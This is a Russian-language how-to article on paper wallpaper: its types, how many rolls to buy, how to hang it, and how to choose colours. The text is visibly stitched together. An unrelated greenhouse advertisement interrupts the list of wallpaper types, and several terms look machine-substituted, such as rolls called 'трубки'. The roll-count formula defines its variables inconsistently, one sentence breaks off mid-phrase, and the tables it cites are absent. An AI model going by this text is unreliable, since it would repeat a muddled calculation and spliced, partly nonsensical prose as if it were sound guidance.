Существуют обои, выполненные полностью из бумаги, и обои, выполненные на бумажной основе. Последние отличаются тем, что их верхний слой выполнен из другого материала — ткани или полимера. Следует иметь в виду, что полимерный слой, винил, воздухонепроницаем, поэтому такие обои не дают стенам «дышать». Сегодняшний рынок стройматериалов предлагает потребителям следующие виды обоев:

1. Симплексные (однослойные) обои. Они полностью выполнены из бумаги, имеют гладкую поверхность, на которую перенесён рисунок типографским способом. Для изготовления дешёвых моделей применяются грубые сорта бумаги. Более дорогая продукция содержит светоустойчивую грунтовку для защиты бумажной основы от выцветания.

Все симплексные обои быстро впитывают клей и размокают, при наклейке плотно прилипают к стене, чётко дублируя весь рельеф её поверхности. Основное достоинство таких изделий состоит в низкой цене, которая позволяет недорого выполнить хороший косметический ремонт квартиры, что особенно выгодно для арендуемых помещений.

Парник «урожайный» – вкусные овощи в любую погоду!

Теплица «Урожайная» – настоящая находка для многих огородников. Множество проблем, которые раньше казались сущим бедствием, теперь решаются очень просто. Основа парника — укрывной материал «Agroflex» и прочные полипропиленовые дуги. Укрывной материал имитирует тропический микроклимат, выдерживает слой снега и не повреждает всходов. Его можно использовать на протяжении нескольких сезонов. Конструкция удобна и практична, а главное – проста в установке, поддерживает оптимальную температуру в парнике, которая так нужна для постоянного роста продуктов, также защищает от вредных насекомых, ветра, дождей и других проявлений природы.

2. Дуплексные (двухслойные) обои. Обладают большей прочностью по сравнению с симплексными обоями, состоят из двух склеенных слоёв. Первый слой представляет ровную основу, на которую наклеен наружный слой с печатным рисунком и рельефной поверхностью, позволяющей скрывать различные дефекты стены. В зависимости от применяемых материалов и способа формирования наружного слоя различают следующие виды двухслойных обоев:

  • Тиснёные обои, в которых рисунок верхнего бумажного слоя выполнен методом тиснения. В результате на поверхности обоев образуется устойчивый рельефный рисунок.
  • Моющиеся обои со специальным влагостойким покрытием на внешнем слое (лаковое или латексное), позволяющим мыть обои с помощью мыльных растворов. Эти обои могут иметь глянцевую или матовую поверхность.
  • Вспененные обои, где на внешний слой нанесено акриловое покрытие, находящееся в пенообразном состоянии, которое образуется при высокой температуре. Оно образует красивый, водонепроницаемый, объёмный рисунок на лицевой поверхности обоев. Такие обои хорошо скрывают дефекты стены, легко моются, но не пропускают воздух и небезопасны для людей склонных к аллергии.
  • Структурные обои, содержащие в наружном слое деревянную стружку, формирующую рельеф и рисунок лицевой поверхности.
  • Эксклюзивные обои с ручным художественным оформлением, в которых оригинальный узор или рисунок исполняется художниками вручную, впоследствии он защищается специальным восковым или лаковым покрытием. Отличительной особенностью таких обоев является высокая стоимость и штучное исполнение

3. Красящиеся обои на бумажной основе, но с бумажным, фризелиновым или стекловолоконным рабочим слоем, предназначенным для неоднократной покраски акриловой краской. Такие обои в зависимости от их вида можно перекрашивать от 3 до 10 раз, что очень удобно для тех, кто любит часто менять интерьер в квартире.

Расчет рулонов

Определить требуемое количество трубок можно двумя методами.

Способ 1. Измеряется высота стены. При этом нужно мерить только ту часть, поверхность которой оклеивается. Это означает, что при наличии несъемного напольного или потолочного плинтуса длина полосы шпалер будет короче высоты потолка. Затем длина трубки, обычно 10 м, делится на полученную длину одной полосы. Таким образом находится количество полноценных листов в одном рулоне.

На следующем этапе вычислений определяется длина периметра и делится на ширину шпалер (0,53 м). Общее количество листов делится на число полос в одной трубке. Результат и есть искомое число. Некоторые домашние мастера могут возразить, что есть окна и двери, площадь которых не вычтена.

Приведенные рассуждения можно выразить формулой: P = T/L x M/K 1(2), где:

  • P — количество рулонов шпалер, шт.;
  • T — длина периметра помещения, м;
  • L — ширина трубки (0,53 м);
  • M — длина полотна шпалер, м;
  • K — длина трубки (10 м, 15 м, 25 м);
  • 1(2) — дополнительные 1-2 трубки на непредвиденные потери.

При высоте рисунка более 6 см ко всем расчетам добавляется 1 трубка шпалер на каждые 6.

Способ 2. Определяются высота потолка и площадь комнаты, после чего искомый результат берется из таблицы, приведенной ниже. В ней не учтены потери на подгонку рисунка.

Таблица 1. Расчет количества рулонов бумажных обоев в зависимости от площади помещения.

Техника оклеивания

Перед оклеиванием бумажных шпалер на всякий случай нужно посмотреть, куда наносить клей: на обои или стену. Об этом производитель делает специальную отметку на вкладыше (см. фото). В отношении бумаги — это 99% обойное полотно. Исключения сделаны для нескольких видов плотных импортных шпалер — клейстер нужно мазать и на стены, и на обойные листы.

Правильный порядок работ:

  • обойный лист укладывается на ровную, сухую поверхность;
  • большой кистью или макловицей клейстер равномерным слоем наносится на первую половину листа. Особое внимание нужно уделить кромке;
  • часть листа с нанесенным клеем сгибается так, чтобы осталась видна вторая, чистая половина;
  • клей намазывается на оставшуюся сухой часть поверхности;
  • второй конец листа сгибается аналогично, после чего он немного скручивается (схема приведена ниже). Такая операция нужна, чтобы клей не сох, а бумага пропиталась клейстером. Время выдержки приведено в таблице 2.

Таблица 2. Время пропитки обоев.

  • пропитавшийся лист наклеивается на стену. Для этого верхняя часть обойного полотна раскрывается, нижняя остается сложенной. Ориентируясь по разметке лист приклеивается. Обойным шпателем удаляются лишний клей и пузыри. Движения от середины к краям. Удаление ведется сверху вниз. Попавший на обои клей убирается сухой тряпкой или губкой;
  • раскрывается низ. Все операции проводятся в том же порядке;
  • полотно прикатывается к стене специальным резиновым валиком. Можно руками, но только плотные обои;
  • по такому же принципу наклеивается второй лист;
  • после наклеивания второго полотна первый лист вверху обрезается ножом. Помогает провести ровный рез широкий металлический шпатель. Полоска удаляется, клей с потолка вытирается тряпкой. Здесь важно не упустить момент: не дать клею на потолке засохнуть;
  • после выполнения всех операций стык прокатывается узким валиком. Если в каких-то местах клей успел засохнуть — край обоев осторожно отводится от стены. Кромка шпалер намазывается повторно клейстером. Многие отделочники мажут пальцем, хотя правильно — кисточкой. Правда, результат одинаковый.

Цвет и тон бумажных обоев

При выборе обоев немаловажным фактором с эстетической стороны является их цвет и рисунок. При выборе цвета нужно учитывать не только эстетические, но и психологические требования и рекомендации. Например, для спальни рекомендуются мягкие цвета и оттенки, способствующие успокоению нервной системы, вызывающие чувство расслабленности и умиротворения. Яркие и контрастные цвета могут подойти в детскую комнату, гостиную, рабочий кабинет.

Следует также учитывать расположение комнаты с точки зрения естественной её освещённости в течение дня. Если она находится на южной стороне и освещена солнцем большую часть суток, то есть смысл оклеивать стены обоями тёмных тонов, поглощающих излишек яркого света.

Цвет обоев также создаёт зрительный эффект увеличения или уменьшения пространства. Направление рисунка и узоров на обоях, также обладают способностью зрительно изменять размеры комнат в высоту и ширину. Так, вертикальные полосы увеличивают высоту комнаты, а мелкий рисунок обоев визуально её расширяет.

Для «уменьшения» комнаты подходят обои с крупным рисунком. При этом, чем больше размеры рисунка, тем мягче следует выбирать тон обоев. Следует помнить, что диагонально направленный рисунок создаёт иллюзию нарушения перпендикулярности стен и потолка (пола).

При выборе товара нужно сравнивать его тональность при искусственном и естественном освещении, так как разница может быть разительной. Обычно рулоны бумажных обоев имеют стандартные размеры 53х1005 см. По внешнему виду они практически не отличаются от своих более дорогих виниловых аналогов.

Особенностью расцветки одинаковых по наименованию моделей обоев является то, что в разных партиях товара оттенок может быть разный, поэтому важно их брать из одной партии. Из этих же соображений нужно приобретать продукцию с небольшим запасом, так как при недоборе товара найти подходящие по тональности обои будет практически невозможно.